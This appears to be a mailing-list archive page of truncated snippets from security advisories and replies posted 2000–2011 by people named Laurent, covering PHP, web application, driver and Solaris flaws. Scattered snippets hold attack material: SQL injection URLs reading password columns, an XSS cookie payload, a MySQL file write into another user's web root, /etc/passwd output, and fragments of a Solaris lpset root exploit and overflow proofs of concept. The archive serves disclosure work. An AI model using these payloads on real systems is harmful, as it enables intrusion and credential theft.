[TEHTRI-Security] Quick BlackBerry Security Check

2011-03-17 Thread Laurent OUDOT at TEHTRI-Security
n2own/CSW exploit from Vincenzo Iozzo, Ralf Philipp Weinmann, and Willem Pinckaers A workaround for this latest vulnerability (CVE-2011-1290) could be to disable JavaScript, as explained on RIM resources. You should definitely read this: http://www.blackberry.com/btsc/KB26132 Have a nice day,

[TEHTRI-Security] Security and iPhone iOS 4.3 Personal Hotspot feature

2011-03-07 Thread Laurent OUDOT at TEHTRI-Security
ations are available here: http://blog.tehtri-security.com/2011/03/about-iphone-ios43-personal-hotspot.html Happy update this week for lucky owners of iPhone / http://apple.com/ios Best regards, Laurent Oudot, CEO TEHTRI-Security Web: http://www.tehtri-security.com twt: @tehtris Join us for more h

[TEHTRI-Security] CVE-2010-2599: Update your BlackBerry

2011-01-21 Thread Laurent OUDOT at TEHTRI-Security
"Good night, and Good luck." Best regards, Laurent OUDOT, from Washington DC, USA @BlackHatDC Briefings ( http://blackhat.com/html/bh-dc-11/bh-dc-11-briefings.html#Oudot ) TEHTRI-Security - "This is not a Game." http://www.tehtri-security.com/ http://twitter/tehtris

[TEHTRI-Security] CVE-2010-1752: Update your MacOSX

2010-11-12 Thread Laurent OUDOT at TEHTRI-Security
010-1752" here too: http://support.apple.com/kb/HT4435 ). Happy update, Apple folks ;-) Best regards, Laurent OUDOT, from Abu Dhabi, UAE @ BlackHat Briefings ( http://blackhat.com/html/bh-ad-10/bh-ad-10-briefings.html#Oudot ) TEHTRI-Security - "This is not a Game." http://www.tehtri-security.com/ http://twitter/tehtris

[TEHTRI-Security Training + 0days] "Hunting Web Attackers" at HITBSecConf

2010-09-07 Thread Laurent OUDOT at TEHTRI-Security
12 October ) : http://conference.hackinthebox.org/hitbsecconf2010kul/?page_id=274 See you soon at the awesome international conference HITBSecConf Malaysia 2010, Laurent OUDOT, CEO & Founder TEHTRI-Security http://www.tehtri-security.com/ * References: - BBC => http://www.bbc.co.uk

Security Advisories from TEHTRI-Security at HITB Europe

2010-07-05 Thread Laurent OUDOT at TEHTRI-Security
y.com/en/agenda.php See you soon. Thanks. Take care. Laurent Oudot, founder & CEO of TEHTRI-Security TEHTRI-Security, "This is not a game". http://www.tehtri-security.com

TEHTRI-Security released 13 0days against web tools used by evil attackers

2010-06-17 Thread Laurent OUDOT at TEHTRI-Security
emote File Disclos More explanations available on our web site: http://www.tehtri-security.com/en/news.php Do not hesitate to contact us directly if needed. Best regards, Take care. Laurent OUDOT - "TEHTRI-Security, This is not a game." CEO & Founder of TEHTRI-Security http://www.tehtri-security.com/

TEHTRI-Security: Many 0days soon released at SyScan Singapore 2010

2010-06-02 Thread Laurent OUDOT at TEHTRI-Security
urity issues, do not hesitate to contact us, so that we can help and assist you with our innovative technologies or our trainings. Laurent OUDOT, Founder and CEO of TEHTRI-Security http://www.tehtri-security.com Next public confirmed event worldwide : - SyScan Singapore (SG), June, Speakers "Str

HITBSecConf DUBAI 2010: Learn more about web attacks and stealth hacking

2010-04-12 Thread Laurent OUDOT at TEHTRI-Security
p of a web attack (backdoors, bounces...) and how to detect them See you soon at HITBSecConf Dubai... Laurent OUDOT, founder & CEO of TEHTRI-Security, "/This is not a game./" http://www.tehtri-security.com

Re: New vulnerability in Xerox Fiery Webtools

2009-11-12 Thread laurent . hermelin
There is no SQL Injection Vulnerability in WebTools as we are not using Database. MyDocs url ("/wt3/ summary.php?select=") is safe as "select" is just name of a variable and the name is nothing to do with select command in SQL. Please provide details about the Fiery model and version so that we

Marvell Driver Multiple Information Element Overflows

2009-11-10 Thread Laurent Butti
sco/Linksys web site. Any other wireless device relying on this vulnerable wireless driver is likely to be vulnerable. Credits: * This vulnerability was discovered by Laurent Butti from France Telecom / Orange

Atheros Driver Reserved Frame Vulnerability

2009-11-10 Thread Laurent Butti
cess point firmwares. This security vulnerability was reported to Netgear, updated firmwares should be available on their web site. Any other wireless device relying on this vulnerable wireless driver is likely to be vulnerable. Credits: * This vulnerability was discovered by Laurent

OSCommerce Session Fixation Vulnerability

2009-04-02 Thread laurent . desaulniers
There is a flaw in the way OSCommerce handles sessions. When a client visits a OSCommerce web page, the server sends a cookie. That cookie will be the session cookie for every further requests. Thus, once logged in, the cookie will be used to authenticate the user. When logging in (without

Cisco Unified IP Phone 7960G and 7940G (SIP) RTP Header Vulnerability

2009-01-14 Thread Laurent Butti
Gabriel Campana and Laurent Butti from France Telecom / Orange

Marvell Driver Malformed Association Request Vulnerability

2008-10-13 Thread Laurent Butti
this vulnerable wireless driver is likely to be vulnerable. Credits: * This vulnerability was discovered by Laurent Butti and Julien Tinnes from France Telecom / Orange

Atheros Vendor Specific Information Element Overflow

2008-09-04 Thread Laurent Butti
lity was reported to Linksys, updated firmwares should be available on their web site. Any other wireless device relying on this vulnerable wireless driver is likely to be vulnerable. Credits: * This vulnerability was discovered by Laurent Butti and Julien Tinnes from France Telecom / Orange

Marvell Driver Null SSID Association Request Vulnerability

2008-09-04 Thread Laurent Butti
ver for their access point firmwares. This security vulnerability was reported to Netgear, updated firmwares should be available on their web site. Any other wireless device relying on this vulnerable wireless driver is likely to be vulnerable. Credits: * This vulnerability was discovered

Marvell Driver EAPoL-Key Length Overflow

2008-09-04 Thread Laurent Butti
ess device relying on this vulnerable wireless driver is likely to be vulnerable. Credits: * This vulnerability was discovered by Laurent Butti and Julien Tinnes from France Telecom / Orange

Cisco Secure ACS EAP Parsing Vulnerability

2008-09-03 Thread Laurent Butti
public release of advisory Credits: * This vulnerability was discovered by Gabriel Campana and Laurent Butti from France Telecom / Orange

Novell Client <= 4.91 SP4 Local Stack overflow / B.S.O.D (unauthentificated user)

2008-05-08 Thread laurent . gaffie
0 eip=73d22054 esp=00dff278 ebp=00dff200 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206 MFC42!Ordinal5163+0x492: 73d22054 8908mov dword ptr [eax],ecx ds:0023:41414141= = 5)Credits laurent gaffié laurent.gaffie[at]gmail[dot]com

xine-lib NES Sound Format Demuxer Buffer Overflow

2008-04-23 Thread laurent . gaffie
Hi there Original advisory: http://milw0rm.com/exploits/5458 There's another stack-based buffer overflow in demux_nfs.c line 111: this->copyright = strdup(&header[0x4E]); line 189: char copyright[100]; line 208: sprintf(copyright, "(C) %s", this->copyright); Regards Laurent Gaffié

Re: NetClassifieds Sql Injection

2008-04-23 Thread laurent . gaffie
Please can you do a simple SEARCH before you start an 'audit' on a software ? http://search.securityfocus.com/swsearch?query=netclassifieds&sbm=%2F&submit=Search%21&metaname=alldoc&sort=swishrank http://milw0rm.com/exploits/4092 http://www.securityfocus.com/archive/1/471944 Thanks for sea

QuickTime <= 7.4.1 QTPlugin.ocx Multiple Remote Stack Overflow

2008-02-13 Thread laurent . gaffie
lor -SetHREF -SetMovieName -SetTarget -SetMatrix = 3)Proof of concept = Proof of concept example [works with the others functions supplyed in section 2) ] : sub test() bar = String(515305, "A") foo.SetBgColor bar End Sub = 5)Credits ===== l

jetAudio <= 7.0.5 (.ASX) Remote Stack Overflow

2008-02-08 Thread laurent . gaffie
close($FILE); print "$file has been created \n";

Konqueror Remote Denial Of Service

2007-11-14 Thread laurent . gaffie
, konqueror will crash. = 3)Proof of concept = Proof of concept example : 4)Greets Berga,team soh, #futurezone, #soh = 5)Credits = laurent gaffié

PHP <= 5.2.5 Gettext Lib Multiple Denial of service

2007-11-13 Thread laurent . gaffie
tation (core dumped) [EMAIL PROTECTED]:/# php -r 'dcgettext(LC_CTYPE,str_repeat("A",8476509),"hi");' Erreur de segmentation (core dumped) 4)Greets Benjilenoob,team soh, #futurezone, #soh = 5)Credits = laurent gaffié

PHP <= 5.2.5 stream_wrapper_register() denial of service

2007-11-13 Thread laurent . gaffie
= 3)Proof of concept = Proof of concept example : result: [EMAIL PROTECTED]:~/Desktop# php shot.php Erreur de segmentation (core dumped) [EMAIL PROTECTED]:~/Desktop# 4)Greets Benjilenoob, Ivanlef0u, la team soh, #futurezone, #soh = 5)Credits = laurent gaffié

Re: Re: RE: playing for fun with <=IE7

2007-10-25 Thread laurent . gaffie
IE7 using the avivra idea/exemple showed on his video here's a live exemple: http://dams083.free.fr/pdf_poc.exe?1.pdf pdf is open , calc.exe is launched no promt . we can imagine the impact with a: -permanent Xss -malicious webpage -worm -etc regards laurent gaffié //sorry for the delay.

Re: A-Cart SQL Injection And Cross-Site Scripting

2007-10-25 Thread laurent . gaffie
"Credits Goes To Aria-Security Team" http://www.securityfocus.com/archive/1/451594

playing for fun with <=IE7

2007-10-13 Thread laurent . gaffie
.htt .itpc .itms .dvr-ms .dib .asf .tif etc ... = 5) Conclusion = this is very funny , because actually it only works for .exe extensions. .COM , .PIF , etc you CANT do this. ( overwrite the extension , and then bypass the filter) i guess we can wonder what the heck. regards laurent gaffié

greensql firewall permanent xss

2007-09-21 Thread laurent . gaffie
! an exemple can be given in the demo website : http://www.greensql.net/sql-injection-test fill login or password with alert(document.cookie) then go in the admin panel :http://demo.greensql.net/ xss will be executed . ===== 5)Credits = Laurent gaffie contact : [EMAIL PROTECTED]

Re Re: PHP 5.2.4 <= various mysql functions safemode & open_basedir bypass

2007-09-12 Thread laurent . gaffie
start to trust theses kinds of functions and then let some holes in the wall letting in the water, your shared env will be down very soon . So i guess the question should be : "shall i let a software drive my security or shall i rtfm and start to know what i'am doing ?"//not talking o

PHP 5.2.4 <= various mysql functions safemode & open_basedir bypass

2007-09-11 Thread laurent . gaffie
mon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync variant : select 'http://site.com/hello.html";)?>' into dumpfile '/home/NOT_MY_USER/www/index1.php'; = 4)Credits & greets ===

/* PHP <=5.2.4 open_basedir bypass & code exec & denial of service errata ... working on windows too .. */

2007-09-10 Thread laurent . gaffie
de segmentation debian:/home/lorenzo# 4)Greets Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone & #nibbles = 5)Credits = laurent gaffié [EMAIL PROTECTED] secorizon coming soon !

PHP <=5.2.4 open_basedir bypass & code exec & denial of service

2007-09-10 Thread laurent . gaffie
4)Greets Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone & #nibbles = 5)Credits = laurent gaffié [EMAIL PROTECTED] secorizon coming soon !

PHP <= 5.2.4 multiple Iconv functions denial of service

2007-09-06 Thread laurent . gaffie
ntation fault. [Switching to Thread -1216637248 (LWP 29543)] 0xb77d9d1b in iconv_open () from /lib/tls/libc.so.6 4)Greets Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone & #nibbles = 5)Credits = Laurent gaffie contact : [EMAIL PROTECTED]

PHP <=5.2.4 iconv_substr() denial of service

2007-09-05 Thread laurent . gaffie
from worldnet: #futurezone & #nibbles = 5)Credits = Laurent gaffie contact : [EMAIL PROTECTED] stay tuned, site comming soon

PHP < 5.2.3 fnmatch() denial of service

2007-09-05 Thread laurent . gaffie
= 5)Credits = Laurent gaffie contact : [EMAIL PROTECTED] stay tuned, site comming soon

PHP < 5.2.4 setlocale() denial of service

2007-09-05 Thread laurent . gaffie
= 5)Credits = Laurent gaffie contact : [EMAIL PROTECTED] stay tuned, site comming soon

PHP < 5.2.3 glob() denial of service

2007-09-05 Thread laurent . gaffie
ignal SIGSEGV, Segmentation fault. [Switching to Thread -1215031616 (LWP 11156)] 0xb79d3a5a in globfree () from /lib/tls/i686/cmov/libc.so.6 4)Greets Ivanlef0u,Deimos,benji,soh ,and everyones on worldnet: #futurezone & #nibbles = 5)Credits = Laurent gaffie contact :

Re: Re: Safari for windows remote arbitry file upload

2007-08-17 Thread laurent . gaffie
"Firefox will do the same if it's configured that.Is this the default behavior with Safari?" yes it's a default setting . "I don't see that this is a bug. Could you explain a little more fully?" well configured like this by default,it's a security hole . it's a perfect hole for a virus, trojan

Safari for windows remote arbitry file upload

2007-08-15 Thread laurent . gaffie
desktop without any prompt ... ) = 4) Conclusion = Any potentially dangerous file should be prompted(like .exe , .com , .pif , etc ) before uploading the file . regards laurent gaffié

Re: Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability

2007-08-10 Thread laurent . gaffie
diffusing this kind of false advisory. regards laurent gaffié

Re: Guestbook Script 1.9 RFI

2007-08-10 Thread laurent . gaffie
code, unless to do a basic search with your editor for : -include($ -include_once($ -require($ -require_once($ plz guys stop diffusing this kind of false advisory. regards laurent gaffié

phpTrafficA < 1.4.2

2007-06-25 Thread laurent . gaffie
s Hamid Ebadi has mention $lang is also vulnerable to directory transversal = 4)Credits = laurent gaffie contact : [EMAIL PROTECTED]

eNdonesia 8.4 [multiple injection sql]

2007-06-22 Thread laurent . gaffie
d.php?mod=publisher&op=viewarticle&cid=2&artid=-9+union+select+1,2,3,4,5,pwd,aid,email,9,0+from+authors/* regards laurent gaffié contact : [EMAIL PROTECTED]

NetClassifieds [multiple vulnerabilities]

2007-06-22 Thread laurent . gaffie
yes ) this will avoid juicy errors , such as table name and the complete query 3) imageresizer.php line 2: ADD : ini_set(display_errors,"0"); ( same reason as Common.php ) line 100 : replace : echo("$msg file=".__FILE__."") BY echo("error while processing

PHP JackKnife [multiple vulnerabilities]

2007-05-31 Thread laurent . gaffie
ot;>alert(document.cookie) Full path : http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq[]=1 http://127.0.0.1/PHPJK/G_Display.php?sSort[]=Name_A http://127.0.0.1/PHPJK/index.php?iParentUnq[]=0 regards laurent gaffie contact: [EMAIL PROTECTED]

cpcommerce < v1.1.0 [sql injection]

2007-05-29 Thread laurent . gaffie
Database Name $config['prefix'] = "cp"; ... '8725ade7b722d1ad43b7b949162eab4d' ps1: 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870 --> /usr/local/apache2/htdocs/cpcommerce/_config.php ps2: /**/cpAccounts/* --> cp = prefix. Accounts --> table_name . (cp is the default one) so you can try with your table prefix . regards laurent gaffie

Re: DGNews version 2.1 SQL Injection Vulnerability

2007-05-29 Thread laurent . gaffie
7%20from%20news_comment/* //information is in the source code. * 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870 = /usr/local/apache2/htdocs/dgnews/admin/conf.php ps: works regardless of php.ini settings . regards laurent gaffie

Re: Jetbox CMS version 2.1 E-Mail Injection Vulnerability

2007-05-16 Thread laurent . gaffie
eges. your file will be located here: ./jetbox/webfiles/yourfile.php solution: 1) xss --> use: http://us.php.net/manual/en/function.htmlentities.php 2) upload script : --> allow only certains extension like : txt,mp3,zip,rar,pdf,odt,doc...etc... regards laurent gaffié.

vbulletin < 3.6.6 [permanent xss]

2007-05-16 Thread laurent . gaffie
d . reminder: permanent xss are dangerous ... see : http://en.wikipedia.org/wiki/Cross_site_scripting regards laurent gaffié contact: laurent.gaffie[at]g/**/m/**/a/**/i/**/l.com

Re: worksystem => Remote File Include Vulnerability Exploit

2006-12-13 Thread Laurent . van_den_reysen
With the version 3.04 this security issue is fixed download and try it: http://worksystem.sourceforge.net best regards Laurent

Re: Opera 9 DoS PoC

2006-06-26 Thread Laurent
On 22 Jun 2006 at 10:36, Darren Clarke wrote: > Tested and confirmed on Opera 9.00 built 8482. > Interesting this also managed to crash Notepad.exe on Windows XP SP2 > Home Edition when viewing the source of the page in IE7 Beta 2. > Discussed here http://my.opera.com/community/forums/topic.dml?

Exploit code for IP Smart Spoofing

2002-11-12 Thread Laurent Licour
erl source) : #!/usr/bin/perl -w # # smartspoof.pl # # This script is provided as proof of concept for educational purpose only # # Laurent Licour 28/10/02 # [EMAIL PROTECTED] # Althes (http://www.althes.fr) # # Start/Stop smartspoofing # http://www.althes.fr/ressources/avis/smartspoofing.htm # # Require

Re: php mail function bypass safe_mode restriction

2001-07-19 Thread Laurent Sintes
> Add this line: extra_cmd=NULL; > in file ext/standard/mail.c, (line #152, juste before if (extra_cmd != > NULL) { ) : > and recompile php. You can also use extra_cmd = php_escape_shell_cmd(extra_cmd); to unescape all characters. In latest CVS you can see extra_cmd = php_escape_shell_arg(Z

Re: php mail function bypass safe_mode restriction

2001-07-19 Thread Laurent Sintes
> Add this line: extra_cmd=NULL; > in file ext/standard/mail.c, (line #152, juste before if (extra_cmd != > NULL) { ) : > and recompile php. You can also use extra_cmd = php_escape_shell_cmd(extra_cmd); to unescape all characters. In latest CVS you can see extra_cmd = php_escape_shell_arg(Z_

php mail function bypass safe_mode restriction

2001-07-18 Thread Laurent Sintes
php mail() function does not do check for escape shell commandes, even if php is running in safe_mode. So it's may be possible to bypass the safe_mode restriction and gain shell access. Affected: php4.0.6 php4.0.5 Significatives lines of ext/standard/mail.c: >extra_cmd = (*argv[4])->value.str.

Re: php breaks safe mode

2001-07-03 Thread Laurent Papier
y problem, I guess fopen/fwrite ... are also a security problem as the attacker can also use fopen/fwrite function to create the file 's2' in /tmp for example. In this case the problem is that the attacker is able to upload and execute a PHP script. And this is not PHP safe_mode fault. So for me error_log do not break safe_mode. -- Laurent Papier - Admin. systeme Sdv Plurimedia - <http://www.sdv.fr>

Re: php breaks safe mode

2001-07-02 Thread Laurent Papier
be used with open_basedir directive in order to limit user filesystem access. As error_log is limited by open_basedir, suexec is not needed to have a secure system as long as open_basedir is correctly set. I see nothing wrong allowing user to use error_log. I don't think PHP-team should change the error-log function. -- Laurent Papier - Admin. systeme Sdv Plurimedia - <http://www.sdv.fr>

Re: Cisco PIX Security Notes

2001-03-15 Thread Laurent LEVIER
CTED] >>PGP Key (DSS) http://naif.itapac.net/naif.asc >> >>Home Page URL:http://www.inet.it >>Sede: Via Darwin, 85 20019 Settimo Milanese (MI) >>Tel: 02-328631 Fax: 02-328637701 >>-- >>Free a

Re: Revival of the SUQ.DIQ homepage

2001-03-11 Thread Laurent LEVIER
the internet. SUQ.DIQ can be found at >http://suq_diq.tripod.com > > >Kim Vanvaeck Laurent LEVIER IT Systems & Networks, Unix System Engineer Security Specialist Argosnet Security Server : http://www.Argosnet.com "Le Veilleur Technologique", "The Technology Watcher"

Re: Solaris 7 x86 lpset exploit.

2000-04-26 Thread Laurent LEVIER
Cheers, Also available on multiple sites (technotronic, Argosnet, rootshell, ...) since a very long time. As said previously, will mail the Sparc version Laurent LEVIER IT Systems & Networks, Unix System Engineer Security Specialist Argosnet Security Server : http://www.Argosnet.com

Re: Solaris 7 x86 lp exploit

2000-04-25 Thread Laurent LEVIER
Hi, I got this exploit working on multiple Solaris (2.5.1, 2.6 & 7), Sparc version. It is similar, but based on lpset command instead of lp, but root privileges gained in a second. Will mail it soon. Laurent LEVIER IT Systems & Networks, Unix System Engineer Security Specialist

Solaris Sparc 2.6 & 7 lp/lpset/lpstat root compromise exploit

2000-04-25 Thread Laurent LEVIER
fprintf(stderr, "ret: 0x%lx xlen: %d ofs: 0x%lx (%d)\n", ret, strlen(buf)-2, ofs, ofs); execl("/usr/bin/lpset","lpset","-n","xfn","-a",&buf[2],"lpcol1",0); perror("execl"); } Laurent LEVIER IT Systems & Networks, Unix System Engineer Security Specialist Argosnet Security Server : http://www.Argosnet.com "Le Veilleur Technologique", "The Technology Watcher"

Timbuktu DoS repaired by Netopia

2000-04-12 Thread Laurent LEVIER
> >Hello Laurent, > >My name is Tal Benzion and I work on the Timbuktu product in Netopia. I am >pleased to let you know that we have fixed the DoS problem with Timbuktu Pro >2000, released on March 15th. This is in regards to your findings, posted >on WIN2K http://

Timbuktu Pro 2.0b650 DoS

2000-02-14 Thread Laurent LEVIER
or example) - Stop Timbuktu services - Start them again. Patches: Not yet Netopia is now aware of this. Best regards Laurent LEVIER IT Systems & Networks, Unix System Engineer Security Specialist Argosnet Security Server : http://www.Argosnet.com "Le Veilleur Technologiqu